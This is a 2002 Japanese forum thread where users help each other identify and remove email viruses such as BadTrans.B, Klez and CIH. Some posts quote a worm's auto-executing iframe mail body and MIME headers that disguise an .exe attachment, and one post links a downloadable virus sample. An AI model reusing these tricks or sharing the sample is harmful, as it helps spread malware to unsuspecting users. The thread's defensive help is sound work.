769 :cheshire-cat:02/03/14 23:52
>>766
XMLって何かの暗号化の技術だっけ?
漏れよく、というか全く知らない。

770 :名無しさん@お腹いっぱい。:02/03/14 23:56
こんなメールが来ました。
htmメール見たいなんですけど。
送信しても大丈夫なのかな?
送信先はMELAD <happy@melad.jp>です。

世直し平成の水戸黄門
正しい世論を喚起し、明るく豊かな新しい日本を創造する
日本国民の最も関心度の高い問題意識に対する

(現金で10万円が当たる抽選券付)
緊 急 世 論 調 査
次のテーマーについてあなたの意見を世論調査に反映させ
新しい日本の創生企画に参画しましょう。
------------------------------------------------------------------------
今、国会を騒がしている、鈴木宗男議員についてあなたのお考えをお聞かせください
------------------------------------------------------------------------

緊急世論調査
鈴木宗男氏は衆議院議員を辞職すべきだ
 賛 成  分からない  反 対


771 :名無しさん@お腹いっぱい。:02/03/14 23:58
>>769
HTML をデータベース目的に変形させたようなものです。
ブラウザで見ることもできるのですが、バグのため、一部の
タグに囲まれた範囲が、エリア指定に関らず、ローカル権限
で実行出来るという離れ技が、離れ技が・・・。

772 :cheshire-cat:02/03/14 23:58
>>770
漏れなら返信しない。

773 :cheshire-cat:02/03/15 00:01
>>771
それって素敵(らぶ
IEの別窓から危険スクリプト実行する奴以来のヒットかも。

メモしておきます。

774 :761:02/03/15 00:03
>763さん
お恥ずかしながら、未だにOutlook Expressを使っております(汗
ただビューウインドは、先だってのウイルス騒ぎに懲りて開いていません。
最近、普通のメールを装ったウイルスメールが多いらしいので、今回も警戒した方がいいかな、
と思いましてお聞きした次第です。
お手数お掛けしますm(_ _)m

775 :名無しさん@お腹いっぱい。:02/03/15 00:03
>>773
私のいい加減な説明よりも、このへん見るとイイです。

ttp://www.asahi-net.or.jp/~ki4s-nkmr/mswatch41.html

776 :名無しさん@お腹いっぱい。:02/03/15 00:07
>>772
では、私も止めときます
(現金で10万円が当たる抽選券付)←この辺がちょっと胡散臭いんで

777 :cheshire-cat:02/03/15 00:09
>>775
感謝。
勉強しておきます。

その下の、mp3とMediaPlayarの奴、気になるね。
先週ZD-Newsに以前載っていた奴だっけ?
今エクセプションを使ったエロサイトが増えたんで、報告例がトレンドだかで2番目らしいけど。
それ使えば、容易かもね。

778 :名無しさん@お腹いっぱい。:02/03/15 00:10
>>770
しかし、どこをどうしたら、世論調査と 10万円の抽選券が結びつくんだ?
胡散臭さ大爆発。

779 :名無しさん@お腹いっぱい。:02/03/15 00:13
>>777
ZDに載ってた奴です。

データファイルそのものにはウィルスはとりつけない
(正確には、とりつけるけど発病出来ない)

という世の中の常識を一気に覆した、ある意味記念すべき
セキュリティホールです。

780 :cheshire-cat:02/03/15 00:13
>>778
アンケート系のメール、怖いよね。
ネット初心者の人には、躊躇無く、住所や氏名、生年月日や電話番号書いちゃう人もいるし。
もっとも手軽な個人情報抜きだよね。

781 :cheshire-cat:02/03/15 00:16
>>779
データファイル感染Villi、漏れ的にはPDFとFlashのは革新的だった。

それだけスキルと情報抱えているなら、固定HN名乗ればいいのに。
そうすれば一過性の人格じゃなくて、永らく付き合えるような気が。

782 :名無しさん@お腹いっぱい。:02/03/15 00:19
>>781
セキュリティホールとかはある程度詳しいですけど、ウィルスは
門外漢なので。
つまり、スレ違いの話題が多くなりそうなので、必要な時だけ出
てきます。

783 :cheshire-cat:02/03/15 00:23
>>782
漏れも自分がよくわからない所の質問はレス書かないし。
そゆスタンスでいいかと。

784 :便器:02/03/15 00:23
>>759
もし、「うんこ」ってタイトルでメールが来たら、
送り手に、便器を添付で送ってください。(´Д` )ノ

ご自由に、↓検索欄に、「便器」と書いて、画像をお探しください。(藁
Google イメージ検索
http://www.google.com/imghp?hl=ja

ちなみに、送り手のアドレスは、最初の文字が空白になっているので、
空白分を削除して直さないと返信でません。

785 :名無しさん@お腹いっぱい。:02/03/15 00:28
>>784
送り手も、無知が故の被害者の可能性があり、あまりお薦めしません。

786 :名無しさん@お腹いっぱい。:02/03/15 01:03
>>770
Google でそのメアドちょこっと検索したが、
http://www.benham.net/pipermail/debbugs/2002-January/
こんな感じのが出てきた。
なんのページだか分からないし、該当箇所クリックしてもエンコード
が変で内容読めないが、はっきり言って、まっとうな連中とは思えん。

787 :名無しさん@お腹いっぱい。:02/03/15 01:23
>>786
それと、内容的には、「反対・賛成・その他」を書き込ませるだけのもの。
何が目的かっていうと、多分、

・送信元はメールアドレスを大量に持っている(多分、10万単位で)
・しかし、そのうち、生きている(現在使われている)アドレスが分からない。
・そこで、片っ端から、このメールを投げる
・真面目に返信してきたら、それは生きているメールアドレス
・生きているアドレスが分かったら、そこ宛てに、オンラインカジノやらポルノやら
億万長者になる方法やらのメールを送信(広告)。死んでるアドレスに投げると宛
て先不明で返ってきて処理に困るから。

788 :名無しさん@お腹いっぱい。:02/03/15 01:25
>>787
これは、「ふるい」と呼ばれるアドレス選別方法で、縄文時代くらいからある
古典的な方法。携帯メールで問題になって、NTTが(的外れな)対策方法を
実践しようとしているはず。

789 :名無しさん@お腹いっぱい。:02/03/15 01:28
>>788
もうひとつ、「10万円の〜」というのと、アンケート形式をとっているのは、
!広告!を件名表示に義務つける法改定の抜け穴を探しただけだと思う。

790 : :02/03/15 18:53

質問です。
メールのウィルスで、OEでプレビューするだけで作動するものが
あったかと思うのですが、なんと言う名前で、
どういう機能を利用して作動するものだったのでしょうか。


791 :名無しさん@お腹いっぱい。:02/03/15 19:05
>>790
BADTRANS_Bのことかな?
機能ならダイレクトオープンだよ


792 :名無しさん@お腹いっぱい。:02/03/15 19:51
>>790
「どういう機能を利用して」の部分がよく分からないのですが、
何を知りたいのでしょうか?

それと、BADTRANS_Bは、ウィルス活動(感染)は行わずに、ワーム
活動のみなので、厳密に言うとウィルスとは呼ばなかったりします。

793 :790:02/03/15 20:13
どういう機能というのは、
JavaScriptとか、ActiveXとかそういうことです。
確か一年位前に初めて出現したような記憶があります。

794 :名無しさん@お腹いっぱい。:02/03/15 20:24
>>793
1) スクリプトを埋めこんだHTMLメールを用意します
2) Outlook Express または Outlook で受信します。
3) アウトルックで、HTMLメールの件名をクリックします。
4) OE または Outlook では、HTMLメールをプレビューモードで開きます。
5) OE または Outlook は、HTML メールを読む時は、IE を内部的に呼びます。
6) IE が埋めこまれたスクリプトを実行。

という流れです。ここでは、HTMLメール内に埋めこむのは Java Script でも
ActiveX でも Visual Basic Script でもなんでもありです。要は、HTML に
記述、実行出来るものならなんでも OK です。

795 :名無しさん@お腹いっぱい。:02/03/15 20:29
>>793
やや記憶が曖昧ながらNimda。
だとすると去年の9月後半くらいか。
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
外した、中盤だ。MIMEコードのファイル誤認識を利用して、
exeファイルを自動実行。Windowsメディアプレーヤーが起動した。

796 :名無しさん@お腹いっぱい。:02/03/15 20:49
>793
http://www.symantec.com/region/jp/sarcj/data/v/vbs.bubbleboy.html
最初はVBS.BubbleBoyが見ただけで感染するウイルス。
しかし、日本語環境では感染できなかった。

余談かもしれんが一応。

797 :cheshire-cat:02/03/16 00:35
>>793
MS99-032とMS01-020。
一番最初のは、796の人のレスのバブルボーイ。
これは日本語版のOSだと、インストール先のフォルダが無かったらしい。
でもOEのセキュリティをめちゃくちゃ固めると、起動できない。

ダイレクトアクション系は、BubbleBoy、Aliz, Badtrans, Klez, Nimda, Toalなど。

798 :名無しさん@お腹いっぱい。:02/03/16 03:26
>>797
<iframe src=3Dcid:SOMECID height=3D0 width=3D0>

ってやつはAlizもBadtransも同じだね

799 :名無しさん@お腹いっぱい。:02/03/16 12:34
JS_EXCEPTION.GEN
に感染したんですけど、どうやったら駆除できますか?

800 :名無しさん@お腹いっぱい。:02/03/16 12:42
>>799
さっさとアンチウィルスソフトを買ってこい。

801 :名無しさん@お腹いっぱい。:02/03/16 12:44
先日のひろゆきへの佐々木という人物の脅迫事件を扱った赤羽警察署は
ひろゆきが被害者であるにも関わらず、ひろゆきに対し、随分と横柄な
態度をしたらしい。
よって2ちゃんねらーの力で赤羽警察に制裁を加えなくてはならない。
赤羽警察の不祥事等情報求む!
http://mentai.2ch.net/test/read.cgi/police/1014406027/

802 :+anonymous:02/03/16 12:49
>>799
実はJS_EXCEPTION.GENの"駆除"はできない。
ていうか手動でFileを削除して書き換えられた設定を元にもどせばOK。
インターネットオプションから設定を書き直しても元に戻るようなシツコイ場合は、
MS-DOSモードで起動→"scanreg /restore"でレジストリまるまる復元。

参考
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN


803 :名無しさん@お腹いっぱい。:02/03/16 13:00
>>802さん
ページが表示されません・・・


804 :名無しさん@お腹いっぱい。:02/03/16 13:01
あっ、でました

805 :名無しさん@お腹いっぱい。:02/03/16 15:39
>>754
シマンテックの奴ら、家で寝てるのか?

サイトには何の記述も無し。

ふざけるな!!!!

806 :Norton AntiVirusに、複数の脆弱性が発見された。 :02/03/16 15:39
http://homepage2.nifty.com/spw/secure/index.html
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html

Content-Type: application/msword;
name=\"Virus.nch\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=\"Virus.exe\"


807 :名無しさん@お腹いっぱい。:02/03/16 15:42
http://www.top.or.jp/~godhand/a2.html

ここGoogleのキャッシュで見ちゃったんだけど大丈夫?


808 :名無しさん@お腹いっぱい。:02/03/16 16:00
>>806
2002限定なのかな?

809 :名無しさん@お腹いっぱい。:02/03/16 16:18
スマンテック
できるヤツは、そもそも日本には居ねぇーんだよ

810 : :02/03/16 17:14
nchではないが似たようなものが
http://easyweb.easynet.co.uk/~hiros/Virus.htm
アンチウィルスソフトで発見不能ウィルス(全てのアンチウィルスで発見できないわけではありません)

「cb4111」 も似たようなもの?

811 :cheshire-cat:02/03/16 18:34
>>806
Nortonの除外リストから、dbxとnchのエクステンションはずせばいいだけのような気が。
Mail保護から漏れても、常駐スキャンでプロセス停止されないのかな。

>>810
以前調べたら、マクロをExcel→Wordだかその逆方向で貼り付けていたので、コードが含まれているにも関わらず検出されないだけだった。

812 :cheshire-cat:02/03/16 18:35
除外拡張子、はずすとどうなるんだ?
ちょっと楽しみ。

813 :cheshire-cat:02/03/16 19:35
はずしてもなぜ不具合が生じないのか不思議だったんだけど。
Outlook Expressを使っていなければ、除外しなくても不具合が起きなかった。

http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/543a1624cf3230b349256a5d004a46e1/b877a752580252a449256aff005d2c63?OpenDocument

http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/543a1624cf3230b349256a5d004a46e1/7a1bb8160ac42cb649256aff005cf154?OpenDocument

http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/7a63e7e7d6a83a5f49256a5d004a46e0/d1e544250123822949256aee00027bad?OpenDocument

814 :名無しさん@お腹いっぱい。:02/03/16 20:48
admin.dll というウイルスにかかってしまいました。
MSNメッセンジャーが使えなくなるやつです。
ノートンアンチウイルス入ってるのに何故かかってしまったんでしょう?

815 :名無しさん@お腹いっぱい。:02/03/16 20:53
>>814
人生そんなもん

816 :名無しさん@お腹いっぱい。:02/03/16 21:40
件名がtestってメールが沢山来ているんですが
これってウイルスですか?
まだ恐くて開いていませんが、教えてください。

817 :名無しさん@お腹いっぱい。:02/03/16 21:41
>>811
とりあえず外しました。

でも何で除外になってたんでしょうね?

818 :名無しさん@お腹いっぱい。:02/03/16 21:44
スマソ。

>>813 のリンク先にモロに書いていた。

漏れはOutlookExpress使ってないから除外してOKみたいです。

819 :(・з;):02/03/16 23:28
差出人 :
"Ramli Bin Ab. Aziz" <_krr6222@tm.net.my>
件名 : Re:
日付 : Fri, 15 Mar 2002 23:44:28 +0800 (SGT)
添付ファイル : Me_nude.MP3.scr (38k), TEXT5.txt (0b)
これってウィルスだよね?


820 :cheshire-cat:02/03/16 23:35
>>819
酔っ払いに絡まれて機嫌悪いんだけど。

漏れのリストには載ってない送信者名。
でも二重拡張子でscr(これってスクリーンセーバー=安心じゃなくて、実行ファイル)だから、おそらくVilli。

821 :名無しさん@お腹いっぱい。:02/03/17 00:26
>>820
それ典型的なBADTRANS_B


822 :名無しさん@お腹いっぱい。:02/03/17 00:26
>>819
まず間違いなく Virus。
即効でゴミ箱にどうぞ。

823 :cheshire-cat:02/03/17 00:30
>>821
送信者もメアドも、チェック漏れだった、と思ってたら。
「メールアドレスの先頭に"_" という文字を付加」、という奴か。

824 :名無しさん@お腹いっぱい。:02/03/17 00:54
どうでもいいけど、差出人の名前がモロにアラブ。

825 :名無しさん@お腹いっぱい。:02/03/17 00:55
ファイル名がどうとか、件名がどうとかいう以前に、心当たりのない
差出人が実行ファイル送ってきたのだからウィルスで当然だと思う
心がけが必要。

826 : :02/03/17 03:06
心当たりのある差出人にも注意!!!!!!!!!!!!!!!!!!!

827 :名無しさん@お腹いっぱい。:02/03/17 03:21
>>826
なんか殺伐とした社会生活を送ってないかキミ。

828 :名無しさん@お腹いっぱい。:02/03/17 03:22
86 :学生さんは名前がない :02/03/16 21:26
法学部で撮ったたぬきの写真。
http://mbspro5.uic.to/user/mikkixi.html
↑はウイルスなんでしょうか?
パソコン初心者なんでよくわかりません。
入ってしまいました。そしたら、いきなりウイルスのインストールを完了しましたって言われた。
まだ、何もおきません。






829 :名無しさん@お腹いっぱい。:02/03/17 03:27
>>828
http://ex.2ch.net/test/read.cgi/entrance/1016211794/
で聞きましょう。

830 :心当たりのある差出人にも注意!!!!!!!!!!!!!!!!!!! :02/03/17 03:44
>>827
アドレス帳にアドレスがある可能性がある。

らるー送ってくるアフォもいる。
−−−−−−
ウイルスのチェックは最低限必要。
−−−−−−
インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?



831 :名無しさん@お腹いっぱい。:02/03/17 06:37
>>819
つーかちょっと待てやおまえさん。
せめて差出人のメアドは伏せてからカキコしなさいや。

832 :名無しさん@お腹いっぱい。:02/03/17 12:59
閲覧したウェブページから送信先、件名、ファイル名を
作成するウィルスらしきメールが送信されてきています。
どなたかウィルス名に心当たりある方はいらっしゃいませんでしょうか?

例えばこのページなら、
To:krr6222@tm.net.my(819参照)
Subject:Symantec(1参照)
添付ファイル:Symantec.exe(またはbat)

また何故かその時閲覧したキャッシュファイルも送ってくるようです。
例:l50[1].html

メールの送信者はどうも、アドレス帳からランダムに選んでいる臭いです。
Recieved fromのサーバとは別のアドレスになっていました。

IPA ISECのデータベースでは分かりませんでした。
情報少ないと思いますが、ご存知でしたら教えて下さい。

833 :832:02/03/17 13:04
追加。

本文は以下のようになっていました。
<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:H8MUE77q083 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

また添付ファイルのContent-typeは
Content-Type: audio/x-midi
です。

834 :名無しさん@お腹いっぱい。:02/03/17 13:05
>>832
http://webmastersecurity.net/00002/00002041.htm

835 :832:02/03/17 13:19
>>834
情報どうもありがとうございます。

ただ、頂いた情報を元にIPA,MacAfee,Symantecで検索したのですが、
一致する情報を得られませんでした・・・。

他のウィルスでは無いでしょうか。
(勘違いでしたら申し訳ありません)

836 :名無しさん@お腹いっぱい。:02/03/17 13:27
横槍な上に関係ないかもしれなくてすみませんが、
http://itpro.nikkeibp.co.jp/NOS/reference/BUGTRAQ-JP-20010409091825-B7A1.txt
この辺が近いかもしれないと思いますが。

837 :832:02/03/17 16:44
>>836
どうもありがとうございます。対策情報ですね?
取り敢えずブラウザ等は最新版(&パッチ)はあてていますが・・・
IEとOE使っていると、いつ感染するか分からないので冷や冷やですね。

ちなみに、また同じ人アドレスからウィルス来ていました。
今度はどうも種類の違うウィルス・・・かもしれませんが。
閲覧したキャッシュファイルを同時に送ると言う特徴は同じです。
こっちもIPAでは検索できませんでした(検索下手?)

Subject:A special new game
本文:
<HTML><HEAD></HEAD><BODY>

<FONT>This is a special new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT>
<br><br>
-----------------------------------------------------<br>
Kredyt przez internet - <a =
href=3Dhttp://www.finanse.hoga.pl>www.finanse.hoga.pl</a><br>
</body></html>

添付ファイル:setup.exe


838 :名無しさん@お腹いっぱい。:02/03/17 17:08
>>837
と言いますか、ウィルスだっていう所まで分かってて、これ以上
何が知りたいんでしょうか?

839 :832:02/03/17 17:25
>>838

具体的な対策を書いてあるサイトなりを知って、
自分のサイトに掲載して他の人に警告と対処方法を教えておきたいんです。
でないと、自分のメールの大半がウィルス状態になりますから・・・(涙)。

840 :名無しさん@お腹いっぱい。:02/03/17 17:30
>>839
誰もお前みたいな無知に教えてほしくないだろ プ

841 :832:02/03/17 18:31
>>840
うーん。まぁ自分が無知なのはどうでも良いんですよ。
取り敢えずほっとくと、益々ウィルスが来そうで・・・。
この場での質問が相応しくないのでしたら、諦めます。


842 :名無しさん@お腹いっぱい。:02/03/17 18:56
>>841
夜中にならないと詳しい人来ないから、暫くしたらまた来るよろし。

843 :名無しさん@お腹いっぱい。:02/03/17 19:15
すみません、質問です。
PCを立ち上げると、WININITが開くようになりました。
検索で調べるとウイルスの可能性が高いようなのですが、WININIT.INIファイルは
見つかりませんし、ノートンのアンチウイルスでスキャンしても何も引っかかり
ません。
どうしたらWININITが立ち上がらないようにできるのでしょうか。
ご存知の方がいらっしゃれば、教えていただけませんか?


844 :名無しさん@お腹いっぱい。:02/03/17 19:26
家のじいちゃんは
I LOVE YOU にやられてから
パソコンの前に塩盛ってるよ

845 :名無しさん@お腹いっぱい。:02/03/17 19:44
>>843
スタートメニューから「ファイル名を指定して実行」で msconfig やってみて。
そこの「スタートアップ」見てみて。
それでわからなかったらもう一回質問して。

846 :832:02/03/17 19:59
>>842
ご助言どうもありがとうございました。
言われたとおり、また後に来ることにします。


847 :843:02/03/17 20:07
>>845
無事直せました、ありがとうございました!
確認した所、load=wininitが2つもチェックついてました……。

848 :名無しさん@お腹いっぱい。:02/03/17 20:25
Worm Klez.Eに感染しました、どうすればいいですか?

849 :名無しさん@お腹いっぱい。:02/03/17 20:29
パソコン初心者ですが去年こんなメールがきました。

差出人:RIKO <_riko51-k3@h3.dion.ne.jp>
日時:2001年11月30日 0:55
件名:Re:
添付:ATT00026.txt(178バイト) ATT00029.txt(137バイト) 
   ATT00032.txt(0バイト) 
------------------ Virus Warning Message (on mail)

Found virus WORM_BADTRANS.B in file Me_nude.MP3.scr
The file Me_nude.MP3.scr is moved to /etc/iscan/virus/virABA0o0mHk.

---------------------------------------------------------
ウイルスは間違いないのですがこのウイルスはどういった症状が起こるのか
教えてください。今のところ特に大きな異変はないです。

850 :名無しさん@お腹いっぱい。:02/03/17 20:34
最近よく来るウイルスメールに、件名が「Run in DOS mode」となっているものが
あります。これについてご存知の方、教えていただけないでしょうか?
検索をかけたのですが、違うものにヒットしてしまってよく分らなかったもので……。

851 :名無しさん@お腹いっぱい。:02/03/17 20:36
>>848
ftp://ftp.europe.f-secure.com/anti-virus/tools/kleztool.zip

852 :名無しさん@お腹いっぱい。:02/03/17 20:39
>>849
--Virus Warning Message 以降の行を読むと、感染する前に隔離
されたっぽいので、症状が起きなくて当然。
そのメールをゴミ箱に放り込めばすべて完了。

853 :名無しさん@お腹いっぱい。:02/03/17 20:44
>>850
情報が少なすぎて調べようがないです・・・。
添付ファイルがあったら添付ファイルの名前を、本文に何か書いてあれば
その内容を教えてください。

854 :名無しさん@お腹いっぱい。:02/03/17 20:46
>>852
そうですか。でも最近小さな異変があるのですがこれはウイルスと関係あるのですか?
症状は↓です。
次のページに進んだり、新しいウインドウで開く時、Internet Explorer の
オン デマンド インストールというのが出てきます。文字を正しく表示するのに
ダウンロードが必要です。という奴です。キャンセルを押しても全然消えなくて、
仕方なくダウンロードをするを押しても、失敗しました。もう一度やり直してください。の繰り返し。
ウインドウを閉じようとするとこれを閉じると問題が発生します。のようなことがでてきます。
結局これは本体の電源を切るまで消えません。

855 :cheshire-cat:02/03/17 20:49
>>854
IEのプロパティ→セキュリティ→フォントのダウンロードを無効にしれ。

856 :名無しさん@お腹いっぱい。:02/03/17 20:50
>854
http://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b@mm.html
まさかsp2にしてないって話じゃないよね?
あと、差出人のアドレスが出ちゃってます。

857 :854:02/03/17 20:53
まだパソコンのことよくわからないのです。sp2も知りません。
>>856のサイトにいけば何かわかるのですか?

858 :名無しさん@お腹いっぱい。:02/03/17 20:53
>>854
どう考えてもウィルスの症状ではない。
ページを表示するのに必要なフォントが無いから(IEが)どこかからダウンロード
しようとしたんだけど失敗した、という風にみえる。
じゃあ何で失敗するのかと聞かれても困るが・・・

859 :cheshire-cat:02/03/17 21:01
>>857
あのー、何だか無視されてるんだけど。
858の人が書いた通りだと。

Windows Updateからフォントを一通り落とせばいいんじゃ?

860 :854:02/03/17 21:04
>>859
わかりました。やってみます。

861 :名無しさん@お腹いっぱい。:02/03/17 21:04
>851
ありがとうございます

862 :非常に珍しいことですが裁判官の個人のHPがあります。:02/03/17 21:43
http://okaguchi.tripod.co.jp/top.htm

863 :名無しさん@お腹いっぱい。:02/03/17 21:46
最近WEBページからよくscriptでウイルス送り込まれて
めちゃくちゃ困っています。

まぁ海外のエロサイトからexploitというのを送り込まれてます。

864 :名無しさん@お腹いっぱい。:02/03/17 21:55
>>863
それで、質問の内容は何ですか?


865 :cheshire-cat:02/03/17 22:26
>>864
エクセプション系をWebTrapでブロックしたって話のような。

866 :名無しさん@お腹いっぱい。:02/03/17 23:14
>>839 :832 :02/03/17 17:25
>具体的な対策を書いてあるサイトなりを知って、
>自分のサイトに掲載して他の人に警告と対処方法を教えておきたいんです。
>でないと、自分のメールの大半がウィルス状態になりますから・・・(涙)。

>>842 :名無しさん@お腹いっぱい。 :02/03/17 18:56
>夜中にならないと詳しい人来ないから、暫くしたらまた来るよろし。

あまり詳しくはないが ^^)、いちおー夜中になったので、マジレスしよう。

アンチウィルスソフトウェア(とくにウイルスバスター)を入れて、
最新で適切な状態(現状エンジンでの LAN を除く)にしていないであろう
のに、ウィルスなのか確認できていないものをウィルスと決めつけて、
「他の人に警告と対処方法を教えて」やるなどすることは、混乱を助長する
だけだ。 (本末転倒という言葉もある)

ってことだ。

867 :(・з;)819:02/03/17 23:14
遅レスすいません。
やっぱウィルスですよね。
>>820-826どうもありがとう。

868 :832:02/03/17 23:41
>>866
アンチウィルスソフトはAVGを入れています。
個人的にウィルス対策はウィルス対策ソフトに頼るだけでなく、
自信の警戒心も必要だと思っておりメールを開いていない為、
対策ソフトによる判別は出来ていません。

"混乱を助長する"可能性は確かにあると思います。
寧ろそのように思ったからこそ、ここで教えて頂いてから通達しようと思い、
質問させて頂きました。
勿論、ここで明確に出来なければ警告は出しません。


869 :Mac+Netscape使っていてよかった:02/03/18 02:33
Nimdaスレに書いてしまったけど…
COPYRIGHT ENDというサブジェクトで来るやつがあるから気をつけて。
添付ファイルなしのやつ。

870 :名無しさん@お腹いっぱい、:02/03/18 03:39
エクセプションに遭遇したとログにあった。
ブロックしたらしいので一安心。
javascriptの不正プログラムがどうとか言ってるけど、
アクティブXでもできそうな気が…
むしろこっちの方が恐い…
勝手に掲示板にスクリプトを書きこむなんてなったら恐いな。
まぁ、2ちゃんねるは安全だろうけど…
そう言えば以前、ニムダをファイアウォールがブロックしてたな…
メール以外からも来るなんて驚きだ…

871 :名無しさん@お腹いっぱい。:02/03/18 06:26
explorer.exeが不正な処理・・・鬱

872 :名無しさん@お腹いっぱい。:02/03/18 08:03
ヘルブレスってネットゲーはウイルスがかかっているって話はまことか(゚∀゚)(゚∀゚)!

873 :名無しさん@お腹いっぱい。:02/03/18 13:03
マカフィーってzipとかlhaファイルを右クリックして個別にスキャンできないんですか?
ノーd先生の時は出来たんですけど…。

何か設定しなければいけないのでしょうか?

当方XP Home
McAfee v4.5.1 SP1です。

874 :名無しさん@お腹いっぱい。:02/03/18 16:00
ウィルスチェックサービスってどこのISPもだんだんオプションとかで
付け始めたし。
JENS SpinNetでとうとう標準装備になったけどこれはどうなんでしょ??
http://www.watch.impress.co.jp/broadband/news/2002/03/18/jens.htm

うちのISPもただにならないかな。。。

875 :JENSに乗り換え検討中:02/03/18 18:13
標準装備っていうのは、目新しい!JENS SpinNetって追加料金なしでメールアドレス6こもらえるから、全アドレスにウイルスチェックついてるのって評価できるんじゃない?他でオプションで申し込むと料金かかるからね。

876 :名無しさん@お腹いっぱい。:02/03/18 18:19
f-tokyo-144116-l3.zero.ad.jp

877 : :02/03/18 19:56
アウトルックエクスプレスを開こうとしたらフリーズしてしまったので、一応ウィルススキャンをしたんです。
そしたらPE_CIHとかいう危険度が高いらしいウィルスが発見されました。
ほとんどの感染ファイルはウィルス駆除ができたのですが、c:\windows\system\mstask.exeというファイルとc:\windows\system\MPREXE.EXEというファイルだけ駆除ができませんでした。
手動で削除しようとしてもWindowsが使用しています、削除できませんと出てきます。
この場合の対処法を教えていただけませんでしょうか?
何回もウィルスバスター2002で駆除しようとしてもその2つのファイルだけは駄目でした。
毎月26日にハードディスクをズタズタにするそうなので早めに教えてください、本当にお願いします。
マシンOSはWindowsMeです。
どうか教えてください、よろしくお願いします。

878 :cheshire-cat:02/03/18 21:37
>>877
駆除ツール使え。

879 : :02/03/18 22:03
>>878
なんのツールを使えばいいんですか?

880 :cheshire-cat:02/03/18 22:19
>>879
トレンドマイクロって今、ほとんど落ちているような状態で接続できないので。
Symantecで検索
http://www.symantec.com/region/jp/sarcj/vinfodb.html

そこから見つかる、SymantecのCIH情報
http://www.symantec.com/region/jp/sarcj/data/w/w95.cih.html

上記に記載されている、Symantecの駆除ツール。
http://www.symantec.com/region/jp/sarcj/kill_cih.html

えっとね。
多分もう、実行ファイルの幾つかは腐ってるから。完全回復しうるかどうか、漏れは保証しないよ。

どうしてもトレンドの情報の方がいいって言うなら。こちらをどうぞ。繋がらないけど。
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=PE%5FCIH

881 :名無しさん@お腹いっぱい。:02/03/18 22:38
>>874
漏れ昔からJENSだから良かっただよ
AT&Tじゃなくなったから乗り換えようかと思ったけどやめとこう

882 :cheshire-cat:02/03/18 23:19
879はお亡くなりになったか、かわいそうに(鬱

883 :832:02/03/18 23:50
ウィルスの詳細情報は結局分かりませんでしたが、
長引かせても申し訳無いので、諦めます。
ご協力下さったみなさん、ありがとうございました。
また自力で何か分かりましたら、ここに書きます。


884 :cheshire-cat:02/03/18 23:55
>>883
漏れのリストには、そういうの載ってない。
けどそれって、既存のVilli改造すれば、容易のような。

でも頂戴。というか、下さい。

885 :832:02/03/19 00:52
>>884
お送りしました。お手数をお掛けします。

886 : :02/03/19 12:40
先日、EASY CD CREATER ver5 を外人からDLしたんです。
それで何気なしにインストールしてから尻無ということに気づいて
削除しました。それから
再起動するたびにEASY CD CREATERのアプグレードを奨めます。
3〜4回目くらいにうんざりしてアプグレしてみようとRoxioに逝きました。
それでアプグレの箇所をクリックしたらいきなり
Operating system not found の画面になったので、
BIOSモードで起動して標準設定値にしましたが直らず、
セーフモードでも起動できません。
どうしたらいいのです?


887 :名無しさん@お腹いっぱい。:02/03/19 12:48
なんで自分の尻拭いを他人にさせるかなあ

fdisk /mbr

888 :886:02/03/19 13:02
>887
漏れはXPにアップグレードしてますが fdisk /mbr
の起動は可能でしょうか?
すいません教えてください

889 :名無しさん@お腹いっぱい。:02/03/19 14:32
>>886
2002年2月の尻集に載ってるのに…

890 :☆最新話題☆:02/03/19 15:34
http://www.kokorode.com/000000/

891 :名無しさん@お腹いっぱい。:02/03/19 15:35
>>888
XPならCDから起動して修復モードコンソールをだせば、
fixboot / fixmbr ってのが使えます
プロンプトでhelpいれると一覧でてくるよ


892 :バカヒー専用スレあります。:02/03/19 19:22
http://pc.2ch.net/test/read.cgi/software/1001838214/-100

893 :名無しさん@お腹いっぱい。:02/03/19 21:44
ウィルスでは無いが、IEに大穴。留意されたし。
http://slashdot.jp/article.pl?sid=02/03/18/2211214&mode=thread
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html


894 :名無しさん@お腹いっぱい。:02/03/19 21:57
さっきHP見てたら突然ウィルスバスターが起動して、
こんなもの拾ってきました。
TROJ_IMISERV.B
HP見ただけで貰うの初めてです


895 :832:02/03/19 23:49
cheshire-cat殿からご回答頂きまして「KLEZ.E」との事でした。
AVGの最新版では感知は出来ないようですのでご注意下さい。
他のウィルス対策ソフトでは感知できるそうです。
それでは、失礼致します。


896 :名無しさん@ぼやき:02/03/20 08:52
いまだにBADTRANS.Bがほいほい届く。今朝も一通。
最初はいちいち「感染してますよ」と知らせていたんだけど、
いい加減面倒くさくなってしまった・・。
本日をもって放っておく事に決定。ちょっとスッキリ。

897 :名無しさん@お腹いっぱい。:02/03/20 10:50
age

898 :Win32.Mimee:02/03/20 14:10
http://www.ebcvg.com/binary2.php

Win32.Mimee
http://www.ebcvg.com/sections/binary/Win32.Mimee.zip
−−−−−
short description :
w32.mimee is written in visual basic 6 and targets .eml files... when executed, it spawns
mime.exe in c:\, searches for .eml in harddrive and infects them by adding itself as an
attachment.. .eml files which are saved in rich text (html), whether or not they contain
attachments, will be successfully infected by w32.mimee... .eml files that are saved in plain
text and are having one or many attachments will also be infected by the virus... .eml files
that are saved in plain text and are containing no attachments won't be successfully infected...

win32.mimee inserts a signature in files that it infects so they won't be reinfected..
no registry modifications are made by the virus...

written just to personally discover the possibility of infecting .eml files...
alcopaul
03/07/2002
−−−−−
Symantec Security Response Automation システムは提出されたファイルを分
析しましたが、悪意があるコードを見つけませんでした。
もし我々に提出したファイルで感染した疑いがあるならば、テクニカルサポー
トにご連絡してください。

899 : MP3ファイルにもウイルス混入は可能 :02/03/20 15:01
http://www.zdnet.co.jp/news/0203/19/e_mp3.html

900 :名無しさん@お腹いっぱい。:02/03/20 21:13
